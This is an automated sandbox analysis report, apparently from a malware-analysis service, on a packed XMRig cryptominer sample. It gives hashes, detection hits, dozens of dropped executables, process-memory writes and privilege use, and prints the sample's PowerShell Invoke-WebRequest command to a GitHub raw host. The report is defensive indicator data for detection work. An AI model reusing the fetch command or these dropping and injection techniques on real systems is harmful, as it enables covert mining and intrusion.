xmrig | abadbb2a6096661105dc38478a5089d563f1b92f6069c80d7a4865e22a6c7e23

Analysis

max time kernel
93s
max time network
130s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
13/05/2024, 07:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
Size

2.9MB
MD5

a75503e804678dd0ec82d3eeb5105100
SHA1

9e26ef79399331a4eab2baaad624522fc091a517
SHA256

abadbb2a6096661105dc38478a5089d563f1b92f6069c80d7a4865e22a6c7e23
SHA512

6af01e90f5da35d4dd60d08a55e1779ef4e8cf4e46630017e72b0a2b5e12980b195857123119c7f3575da53623b3eeb33266303e873849f18bb3e2bd7aee8fc6
SSDEEP

49152:S1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrWax9hMkHC0I6Gz3N1pHV4:S1ONtyBeSFkXV1etEKLlWUTOfeiRA2RK

Score

10^/10

xmrig execution miner upx

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 64 IoCs

miner

resource	yara_rule
behavioral2/memory/4412-0-0x00007FF6283C0000-0x00007FF6287B6000-memory.dmp	xmrig
behavioral2/files/0x00090000000233d3-6.dat	xmrig
behavioral2/files/0x00070000000233e0-8.dat	xmrig
behavioral2/files/0x00070000000233e2-20.dat	xmrig
behavioral2/files/0x00070000000233e5-39.dat	xmrig
behavioral2/files/0x00070000000233e8-65.dat	xmrig
behavioral2/files/0x00070000000233e9-76.dat	xmrig
behavioral2/files/0x00070000000233ec-86.dat	xmrig
behavioral2/files/0x00070000000233ee-96.dat	xmrig
behavioral2/files/0x00080000000233ea-105.dat	xmrig
behavioral2/files/0x00070000000233f6-138.dat	xmrig
behavioral2/files/0x00070000000233fc-165.dat	xmrig
behavioral2/memory/1244-792-0x00007FF620500000-0x00007FF6208F6000-memory.dmp	xmrig
behavioral2/memory/4604-802-0x00007FF65CFC0000-0x00007FF65D3B6000-memory.dmp	xmrig
behavioral2/memory/740-806-0x00007FF736130000-0x00007FF736526000-memory.dmp	xmrig
behavioral2/memory/864-812-0x00007FF745C80000-0x00007FF746076000-memory.dmp	xmrig
behavioral2/memory/2892-815-0x00007FF787F80000-0x00007FF788376000-memory.dmp	xmrig
behavioral2/memory/744-818-0x00007FF60CF60000-0x00007FF60D356000-memory.dmp	xmrig
behavioral2/memory/3344-822-0x00007FF748C10000-0x00007FF749006000-memory.dmp	xmrig
behavioral2/files/0x00070000000233fe-175.dat	xmrig
behavioral2/files/0x00070000000233fd-170.dat	xmrig
behavioral2/files/0x00070000000233fb-168.dat	xmrig
behavioral2/files/0x00070000000233fa-163.dat	xmrig
behavioral2/files/0x00070000000233f9-158.dat	xmrig
behavioral2/files/0x00070000000233f8-153.dat	xmrig
behavioral2/files/0x00070000000233f7-148.dat	xmrig
behavioral2/files/0x00070000000233f5-136.dat	xmrig
behavioral2/files/0x00070000000233f4-131.dat	xmrig
behavioral2/files/0x00070000000233f3-126.dat	xmrig
behavioral2/files/0x00070000000233f2-121.dat	xmrig
behavioral2/files/0x00070000000233f1-115.dat	xmrig
behavioral2/files/0x00070000000233f0-111.dat	xmrig
behavioral2/files/0x00070000000233ef-101.dat	xmrig
behavioral2/files/0x00070000000233ed-91.dat	xmrig
behavioral2/files/0x00080000000233eb-80.dat	xmrig
behavioral2/files/0x00070000000233e7-63.dat	xmrig
behavioral2/files/0x00070000000233e6-55.dat	xmrig
behavioral2/memory/4624-825-0x00007FF7448B0000-0x00007FF744CA6000-memory.dmp	xmrig
behavioral2/files/0x00070000000233e4-43.dat	xmrig
behavioral2/files/0x00070000000233e3-27.dat	xmrig
behavioral2/files/0x00070000000233e1-31.dat	xmrig
behavioral2/files/0x00080000000233df-18.dat	xmrig
behavioral2/memory/2148-837-0x00007FF619640000-0x00007FF619A36000-memory.dmp	xmrig
behavioral2/memory/4972-840-0x00007FF7E4FC0000-0x00007FF7E53B6000-memory.dmp	xmrig
behavioral2/memory/1296-845-0x00007FF6C8B00000-0x00007FF6C8EF6000-memory.dmp	xmrig
behavioral2/memory/3236-852-0x00007FF764570000-0x00007FF764966000-memory.dmp	xmrig
behavioral2/memory/1804-856-0x00007FF6E7300000-0x00007FF6E76F6000-memory.dmp	xmrig
behavioral2/memory/1032-859-0x00007FF60DDB0000-0x00007FF60E1A6000-memory.dmp	xmrig
behavioral2/memory/2936-862-0x00007FF7976C0000-0x00007FF797AB6000-memory.dmp	xmrig
behavioral2/memory/4932-863-0x00007FF645180000-0x00007FF645576000-memory.dmp	xmrig
behavioral2/memory/4576-870-0x00007FF731580000-0x00007FF731976000-memory.dmp	xmrig
behavioral2/memory/2412-871-0x00007FF7C40A0000-0x00007FF7C4496000-memory.dmp	xmrig
behavioral2/memory/3548-868-0x00007FF64E960000-0x00007FF64ED56000-memory.dmp	xmrig
behavioral2/memory/4968-875-0x00007FF7A4160000-0x00007FF7A4556000-memory.dmp	xmrig
behavioral2/memory/432-867-0x00007FF72A390000-0x00007FF72A786000-memory.dmp	xmrig
behavioral2/memory/4144-858-0x00007FF6EECE0000-0x00007FF6EF0D6000-memory.dmp	xmrig
behavioral2/memory/3848-834-0x00007FF6D3420000-0x00007FF6D3816000-memory.dmp	xmrig
behavioral2/memory/3952-833-0x00007FF7B0880000-0x00007FF7B0C76000-memory.dmp	xmrig
behavioral2/memory/1244-2133-0x00007FF620500000-0x00007FF6208F6000-memory.dmp	xmrig
behavioral2/memory/4604-2134-0x00007FF65CFC0000-0x00007FF65D3B6000-memory.dmp	xmrig
behavioral2/memory/744-2135-0x00007FF60CF60000-0x00007FF60D356000-memory.dmp	xmrig
behavioral2/memory/864-2137-0x00007FF745C80000-0x00007FF746076000-memory.dmp	xmrig
behavioral2/memory/740-2136-0x00007FF736130000-0x00007FF736526000-memory.dmp	xmrig
behavioral2/memory/4144-2139-0x00007FF6EECE0000-0x00007FF6EF0D6000-memory.dmp	xmrig

Blocklisted process makes network request 8 IoCs

flow	pid	Process
3	2968	powershell.exe
5	2968	powershell.exe
9	2968	powershell.exe
10	2968	powershell.exe
12	2968	powershell.exe
13	2968	powershell.exe
17	2968	powershell.exe
19	2968	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
2968	powershell.exe

Executes dropped EXE 64 IoCs

pid	Process
1244	VDQvpFT.exe
4604	rUfMTdB.exe
740	fTPuUKL.exe
864	QisIcuy.exe
2892	mmkNekF.exe
744	mmMqKkx.exe
3344	FKWbjDW.exe
4624	rilRdKJ.exe
3952	RGccTbF.exe
4968	SqELIBg.exe
3848	SZjdjPB.exe
2148	IvwwEtP.exe
4972	CPSoWxU.exe
1296	mdfGeJS.exe
3236	dbvcccI.exe
1804	hMpyZye.exe
4144	IhkNmYQ.exe
1032	KYkydxb.exe
2936	VjUKVqX.exe
4932	zScgRDT.exe
432	xIzwRAC.exe
3548	qhjGsBn.exe
4576	IbPAPYW.exe
2412	gDgVOgN.exe
4812	PftoGcI.exe
1360	gbbRdVs.exe
1772	aIzDkaw.exe
2652	vtAyiAT.exe
212	bpRRydt.exe
392	tIFoptD.exe
508	LWKFtho.exe
1856	lOvcOXp.exe
3608	IEWnqDc.exe
1316	dTNbWAl.exe
3312	FaJoitq.exe
2316	HGfkftY.exe
1372	KAOoARG.exe
4788	EillYfY.exe
2644	QEWPkay.exe
4612	TFsrVBq.exe
692	IQLHyXP.exe
624	PCPRqoe.exe
3564	ghJfDEl.exe
3120	UsYcXyi.exe
4692	RvkFNdD.exe
1036	goUpVvx.exe
3552	SMWUGav.exe
2192	XFnxUlG.exe
4080	kZEkmGa.exe
2420	zCoKMhQ.exe
4984	aHTGdSW.exe
4824	LbSojLP.exe
4640	rTRjfOi.exe
4368	HsGNoMz.exe
3764	Fbhfgek.exe
3452	XBMUWbW.exe
216	RxESzrK.exe
3108	WfGBCgQ.exe
2688	xMMLfoQ.exe
4944	buQhTku.exe
2060	WkIrROI.exe
4832	pVUZIVk.exe
3636	VviRmDr.exe
1148	xwRigrC.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/4412-0-0x00007FF6283C0000-0x00007FF6287B6000-memory.dmp	upx
behavioral2/files/0x00090000000233d3-6.dat	upx
behavioral2/files/0x00070000000233e0-8.dat	upx
behavioral2/files/0x00070000000233e2-20.dat	upx
behavioral2/files/0x00070000000233e5-39.dat	upx
behavioral2/files/0x00070000000233e8-65.dat	upx
behavioral2/files/0x00070000000233e9-76.dat	upx
behavioral2/files/0x00070000000233ec-86.dat	upx
behavioral2/files/0x00070000000233ee-96.dat	upx
behavioral2/files/0x00080000000233ea-105.dat	upx
behavioral2/files/0x00070000000233f6-138.dat	upx
behavioral2/files/0x00070000000233fc-165.dat	upx
behavioral2/memory/1244-792-0x00007FF620500000-0x00007FF6208F6000-memory.dmp	upx
behavioral2/memory/4604-802-0x00007FF65CFC0000-0x00007FF65D3B6000-memory.dmp	upx
behavioral2/memory/740-806-0x00007FF736130000-0x00007FF736526000-memory.dmp	upx
behavioral2/memory/864-812-0x00007FF745C80000-0x00007FF746076000-memory.dmp	upx
behavioral2/memory/2892-815-0x00007FF787F80000-0x00007FF788376000-memory.dmp	upx
behavioral2/memory/744-818-0x00007FF60CF60000-0x00007FF60D356000-memory.dmp	upx
behavioral2/memory/3344-822-0x00007FF748C10000-0x00007FF749006000-memory.dmp	upx
behavioral2/files/0x00070000000233fe-175.dat	upx
behavioral2/files/0x00070000000233fd-170.dat	upx
behavioral2/files/0x00070000000233fb-168.dat	upx
behavioral2/files/0x00070000000233fa-163.dat	upx
behavioral2/files/0x00070000000233f9-158.dat	upx
behavioral2/files/0x00070000000233f8-153.dat	upx
behavioral2/files/0x00070000000233f7-148.dat	upx
behavioral2/files/0x00070000000233f5-136.dat	upx
behavioral2/files/0x00070000000233f4-131.dat	upx
behavioral2/files/0x00070000000233f3-126.dat	upx
behavioral2/files/0x00070000000233f2-121.dat	upx
behavioral2/files/0x00070000000233f1-115.dat	upx
behavioral2/files/0x00070000000233f0-111.dat	upx
behavioral2/files/0x00070000000233ef-101.dat	upx
behavioral2/files/0x00070000000233ed-91.dat	upx
behavioral2/files/0x00080000000233eb-80.dat	upx
behavioral2/files/0x00070000000233e7-63.dat	upx
behavioral2/files/0x00070000000233e6-55.dat	upx
behavioral2/memory/4624-825-0x00007FF7448B0000-0x00007FF744CA6000-memory.dmp	upx
behavioral2/files/0x00070000000233e4-43.dat	upx
behavioral2/files/0x00070000000233e3-27.dat	upx
behavioral2/files/0x00070000000233e1-31.dat	upx
behavioral2/files/0x00080000000233df-18.dat	upx
behavioral2/memory/2148-837-0x00007FF619640000-0x00007FF619A36000-memory.dmp	upx
behavioral2/memory/4972-840-0x00007FF7E4FC0000-0x00007FF7E53B6000-memory.dmp	upx
behavioral2/memory/1296-845-0x00007FF6C8B00000-0x00007FF6C8EF6000-memory.dmp	upx
behavioral2/memory/3236-852-0x00007FF764570000-0x00007FF764966000-memory.dmp	upx
behavioral2/memory/1804-856-0x00007FF6E7300000-0x00007FF6E76F6000-memory.dmp	upx
behavioral2/memory/1032-859-0x00007FF60DDB0000-0x00007FF60E1A6000-memory.dmp	upx
behavioral2/memory/2936-862-0x00007FF7976C0000-0x00007FF797AB6000-memory.dmp	upx
behavioral2/memory/4932-863-0x00007FF645180000-0x00007FF645576000-memory.dmp	upx
behavioral2/memory/4576-870-0x00007FF731580000-0x00007FF731976000-memory.dmp	upx
behavioral2/memory/2412-871-0x00007FF7C40A0000-0x00007FF7C4496000-memory.dmp	upx
behavioral2/memory/3548-868-0x00007FF64E960000-0x00007FF64ED56000-memory.dmp	upx
behavioral2/memory/4968-875-0x00007FF7A4160000-0x00007FF7A4556000-memory.dmp	upx
behavioral2/memory/432-867-0x00007FF72A390000-0x00007FF72A786000-memory.dmp	upx
behavioral2/memory/4144-858-0x00007FF6EECE0000-0x00007FF6EF0D6000-memory.dmp	upx
behavioral2/memory/3848-834-0x00007FF6D3420000-0x00007FF6D3816000-memory.dmp	upx
behavioral2/memory/3952-833-0x00007FF7B0880000-0x00007FF7B0C76000-memory.dmp	upx
behavioral2/memory/1244-2133-0x00007FF620500000-0x00007FF6208F6000-memory.dmp	upx
behavioral2/memory/4604-2134-0x00007FF65CFC0000-0x00007FF65D3B6000-memory.dmp	upx
behavioral2/memory/744-2135-0x00007FF60CF60000-0x00007FF60D356000-memory.dmp	upx
behavioral2/memory/864-2137-0x00007FF745C80000-0x00007FF746076000-memory.dmp	upx
behavioral2/memory/740-2136-0x00007FF736130000-0x00007FF736526000-memory.dmp	upx
behavioral2/memory/4144-2139-0x00007FF6EECE0000-0x00007FF6EF0D6000-memory.dmp	upx

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	raw.githubusercontent.com
3	raw.githubusercontent.com

Drops file in Windows directory 64 IoCs

description	ioc	Process
File created	C:\Windows\System\EvyTEtR.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\fgcYgio.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\SQTBHcs.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\pfIXLGd.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\CPEyxFz.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\hVxRObL.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\odrorYU.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\slTbEKz.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\tOrsHMi.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\XCkSnRj.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\Qgubxye.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\JdPqiZK.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\hQQSeDd.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\THXAKqC.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\DDKePdi.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\idWBzJj.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\UnYCygE.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\RZhfiZr.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\KTyFfNu.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\luxbkKf.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\qFjrDkf.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\VVpxJOx.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\AhoSyIl.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\cfkZGBO.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\pADeTWu.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\UjRlPuI.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\eLmvYeL.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\vdXnciM.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\ytwapRG.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\NeBHyOx.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\XgYBqac.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\mOoatNm.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\NdoMmmW.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\uEhTizY.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\TZbeNdN.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\xaQKaCj.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\bpDOCwx.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\pDMeZFp.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\cGQUDOG.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\qxzvpdO.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\TVcUpFG.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\nQBxnkX.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\kJmkkMU.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\dcOCoUQ.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\CjBAgoa.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\DSFreyk.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\ylMSzut.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\AdlXULN.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\RALgZxM.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\nmRTKgl.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\kdbUqSq.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\beVrjgP.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\PvagugR.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\rjHAnFU.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\Dmkshcd.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\ofhhaln.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\ypnidtN.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\ehxOmky.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\IMcLrAi.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\aFsBzVC.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\ERScTON.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\OxKjUzZ.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\tMMvHCS.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
File created	C:\Windows\System\avOFlyp.exe	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2968	powershell.exe
2968	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeLockMemoryPrivilege	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
Token: SeLockMemoryPrivilege	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
Token: SeDebugPrivilege	2968	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4412 wrote to memory of 2968	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	82
PID 4412 wrote to memory of 2968	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	82
PID 4412 wrote to memory of 1244	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	83
PID 4412 wrote to memory of 1244	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	83
PID 4412 wrote to memory of 4604	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	84
PID 4412 wrote to memory of 4604	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	84
PID 4412 wrote to memory of 740	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	85
PID 4412 wrote to memory of 740	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	85
PID 4412 wrote to memory of 864	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	86
PID 4412 wrote to memory of 864	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	86
PID 4412 wrote to memory of 2892	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	87
PID 4412 wrote to memory of 2892	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	87
PID 4412 wrote to memory of 744	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	88
PID 4412 wrote to memory of 744	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	88
PID 4412 wrote to memory of 3344	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	89
PID 4412 wrote to memory of 3344	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	89
PID 4412 wrote to memory of 4624	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	90
PID 4412 wrote to memory of 4624	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	90
PID 4412 wrote to memory of 3952	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	91
PID 4412 wrote to memory of 3952	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	91
PID 4412 wrote to memory of 4968	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	92
PID 4412 wrote to memory of 4968	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	92
PID 4412 wrote to memory of 3848	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	93
PID 4412 wrote to memory of 3848	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	93
PID 4412 wrote to memory of 2148	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	94
PID 4412 wrote to memory of 2148	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	94
PID 4412 wrote to memory of 4972	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	95
PID 4412 wrote to memory of 4972	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	95
PID 4412 wrote to memory of 1296	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	96
PID 4412 wrote to memory of 1296	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	96
PID 4412 wrote to memory of 3236	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	97
PID 4412 wrote to memory of 3236	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	97
PID 4412 wrote to memory of 1804	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	98
PID 4412 wrote to memory of 1804	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	98
PID 4412 wrote to memory of 4144	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	99
PID 4412 wrote to memory of 4144	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	99
PID 4412 wrote to memory of 1032	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	100
PID 4412 wrote to memory of 1032	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	100
PID 4412 wrote to memory of 2936	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	101
PID 4412 wrote to memory of 2936	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	101
PID 4412 wrote to memory of 4932	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	102
PID 4412 wrote to memory of 4932	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	102
PID 4412 wrote to memory of 432	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	103
PID 4412 wrote to memory of 432	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	103
PID 4412 wrote to memory of 3548	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	104
PID 4412 wrote to memory of 3548	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	104
PID 4412 wrote to memory of 4576	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	105
PID 4412 wrote to memory of 4576	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	105
PID 4412 wrote to memory of 2412	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	106
PID 4412 wrote to memory of 2412	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	106
PID 4412 wrote to memory of 4812	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	107
PID 4412 wrote to memory of 4812	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	107
PID 4412 wrote to memory of 1360	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	108
PID 4412 wrote to memory of 1360	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	108
PID 4412 wrote to memory of 1772	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	109
PID 4412 wrote to memory of 1772	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	109
PID 4412 wrote to memory of 2652	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	110
PID 4412 wrote to memory of 2652	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	110
PID 4412 wrote to memory of 212	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	111
PID 4412 wrote to memory of 212	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	111
PID 4412 wrote to memory of 392	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	112
PID 4412 wrote to memory of 392	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	112
PID 4412 wrote to memory of 508	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	113
PID 4412 wrote to memory of 508	4412	a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe	113

C:\Users\Admin\AppData\Local\Temp\a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\a75503e804678dd0ec82d3eeb5105100_NeikiAnalytics.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4412
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2968
- C:\Windows\System\VDQvpFT.exe
  C:\Windows\System\VDQvpFT.exe
  2⤵
  - Executes dropped EXE
  PID:1244
- C:\Windows\System\rUfMTdB.exe
  C:\Windows\System\rUfMTdB.exe
  2⤵
  - Executes dropped EXE
  PID:4604
- C:\Windows\System\fTPuUKL.exe
  C:\Windows\System\fTPuUKL.exe
  2⤵
  - Executes dropped EXE
  PID:740
- C:\Windows\System\QisIcuy.exe
  C:\Windows\System\QisIcuy.exe
  2⤵
  - Executes dropped EXE
  PID:864
- C:\Windows\System\mmkNekF.exe
  C:\Windows\System\mmkNekF.exe
  2⤵
  - Executes dropped EXE
  PID:2892
- C:\Windows\System\mmMqKkx.exe
  C:\Windows\System\mmMqKkx.exe
  2⤵
  - Executes dropped EXE
  PID:744
- C:\Windows\System\FKWbjDW.exe
  C:\Windows\System\FKWbjDW.exe
  2⤵
  - Executes dropped EXE
  PID:3344
- C:\Windows\System\rilRdKJ.exe
  C:\Windows\System\rilRdKJ.exe
  2⤵
  - Executes dropped EXE
  PID:4624
- C:\Windows\System\RGccTbF.exe
  C:\Windows\System\RGccTbF.exe
